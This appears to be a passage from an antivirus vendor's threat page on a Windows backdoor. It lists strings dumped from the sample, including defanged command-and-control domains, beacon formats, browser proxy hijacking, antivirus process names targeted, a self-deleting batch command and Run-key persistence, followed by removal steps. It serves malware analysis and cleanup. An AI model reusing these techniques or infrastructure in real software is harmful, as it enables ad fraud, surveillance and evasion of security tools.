hXXp://alleducationalsoftware.com/creditcard.png
hXXp://alleducationalsoftware.com/creditcard2.png
hXXp://patentgenius.com/temp/head.png
hXXp://patentgenius.com/132.gif
hXXp://patentgenius.com/133.gif
hXXp://freedownload3.com/screenshot/4/s/89_3276.gif
hXXp://freedownload3.com/screenshot/4/s/89_3277.gif
hXXp://freedownload3.com/screenshot/4/s/89_3278.gif
hXXp://istockanalyst.com/png/intel.gif
hXXp://istockanalyst.com/png/intel.jpg
hXXp://istockanalyst.com/12.jpg
hXXp://complaintsboard.com/complaints/logo.png
hXXp://complaintsboard.com/complaints/zip.png
hXXp://complaintsboard.com/complaints/rar.png
hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi
hXXp://highspeedinternetlosangeles.webnode.com/news/1.php
hXXp://highspeedinternetlosangeles.webnode.com/news/2.php
hXXp://newworldorderreport.com/favicon.ico
hXXp://newworldorderreport.com/img/3421.png
hXXp://newworldorderreport.com/img/3422.png
hXXp://jointhenewworldorder.com/images/pages.jpg
hXXp://jointhenewworldorder.com/images/pages.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
hXXp://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
Opera
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
bing.com:80/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=116&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\DFB5
.text
`.rdata
@.data
.rsrc
.FDDD
]dd
':.kjV
%cjO.
.TVU&
KERNEL32.dll
GetCPInfo
RPCRT4
SHLWAPI.dll
PathCreateFromUrlW
^{.zE_
%uQ3N
Fj.YG
6þR8
lqN%uA@
%x)YgA
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpenRequest
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
L(w.Sw
{z.zYE
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

%original file name%.exe_348_rwx_0020B000_00001000:

CryptDllExportPublicKeyInfoEx
CryptDllImportPublicKeyInfoEx
CryptDllConvertPublicKeyInfo
w1.2.840.113549.1.1.1
w1.3.14.3.2.12
w1.2.840.10040.4.1
w1.2.840.10046.2.1
w1.2.840.113549.1.3.1
w1.3.14.3.2.22
CertDllVerifyRevocation
CertDllVerifyCTLUsage
w2.5.4.3
w2.5.4.4
w2.5.4.5
w2.5.4.6
w2.5.4.7
w2.5.4.8
w2.5.4.9
w2.5.4.10
w2.5.4.11
w2.5.4.12
w2.5.4.13
w2.5.4.14
w2.5.4.15
w2.5.4.16
w2.5.4.17
w2.5.4.18
w2.5.4.19
w2.5.4.20
w2.5.4.21
w2.5.4.22
w2.5.4.23
w2.5.4.24
w2.5.4.25
w2.5.4.26
w2.5.4.27
w2.5.4.28
w2.5.4.29
w2.5.4.30
w2.5.4.31
w2.5.4.32
w2.5.4.33
w2.5.4.34
w2.5.4.35
w2.5.4.36
w2.5.4.37
w2.5.4.38
w2.5.4.39
w2.5.4.40
w2.5.4.42
w2.5.4.43
w0.9.2342.19200300.100.1.

%original file name%.exe_348_rwx_00400000_00068000:

`.rsrc
].mW$
u.Vh|
SSShkU@
SSSh 
SSj%S
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=116
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
firoli-sys.com
hoststorageforyou.com
wwwmediahosts.com
blogercontent.com
halinoiser.com
allforyourimage.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
hXXp://binghamtonschools.org/images/297893.jpg
hXXp://binghamtonschools.org/images/297894.jpg
hXXp://alleducationalsoftware.com/creditcardlogos.gif
hXXp://alleducationalsoftware.com/creditcard.png
hXXp://alleducationalsoftware.com/creditcard2.png
hXXp://patentgenius.com/temp/head.png
hXXp://patentgenius.com/132.gif
hXXp://patentgenius.com/133.gif
hXXp://freedownload3.com/screenshot/4/s/89_3276.gif
hXXp://freedownload3.com/screenshot/4/s/89_3277.gif
hXXp://freedownload3.com/screenshot/4/s/89_3278.gif
hXXp://istockanalyst.com/png/intel.gif
hXXp://istockanalyst.com/png/intel.jpg
hXXp://istockanalyst.com/12.jpg
hXXp://complaintsboard.com/complaints/logo.png
hXXp://complaintsboard.com/complaints/zip.png
hXXp://complaintsboard.com/complaints/rar.png
hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi
hXXp://highspeedinternetlosangeles.webnode.com/news/1.php
hXXp://highspeedinternetlosangeles.webnode.com/news/2.php
hXXp://newworldorderreport.com/favicon.ico
hXXp://newworldorderreport.com/img/3421.png
hXXp://newworldorderreport.com/img/3422.png
hXXp://jointhenewworldorder.com/images/pages.jpg
hXXp://jointhenewworldorder.com/images/pages.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
hXXp://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
Opera
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
bing.com:80/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=116&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\DFB5
.text
`.rdata
@.data
.rsrc
.FDDD
]dd
':.kjV
%cjO.
.TVU&
KERNEL32.dll
GetCPInfo
RPCRT4
SHLWAPI.dll
PathCreateFromUrlW
^{.zE_
%uQ3N
Fj.YG
6þR8
lqN%uA@
%x)YgA
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpenRequest
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

7.tmp_2448:

.text
`.rdata
@.data
.rsrc
.FDDD
]dd
':.kjV
%cjO.
.TVU&
KERNEL32.dll
GetCPInfo
RPCRT4
SHLWAPI.dll
PathCreateFromUrlW
^{.zE_
%uQ3N
Fj.YG
6þR8
lqN%uA@
%x)YgA

7.tmp_2448_rwx_00147000_0000F000:

\7.tmp
.FDDD
]dd
':.kjV
%cjO.
.TVU&
KERNEL32.dll
GetCPInfo
RPCRT4
SHLWAPI.dll
PathCreateFromUrlW
^{.zE_
WINDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
\WINDOWS\system32\dwwin.exe
NDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\

7.tmp_2448_rwx_0040F000_00001000:

KERNEL32.dll
GetCPInfo
RPCRT4
SHLWAPI.dll
PathCreateFromUrlW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    dwwin.exe:2536
    %original file name%.exe:2896
    %original file name%.exe:1952

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\d9bd_appcompat.txt (1775 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4D0F8.dmp (76112 bytes)
    %System%\config\software (838 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (1390 bytes)
    %Program Files%\LP\DFB5\7.tmp (12588 bytes)
    %Program Files%\LP\DFB5\C29.exe (274098 bytes)
    %System%\config\SOFTWARE.LOG (1987 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "C29.exe" = "%Program Files%\LP\DFB5\C29.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now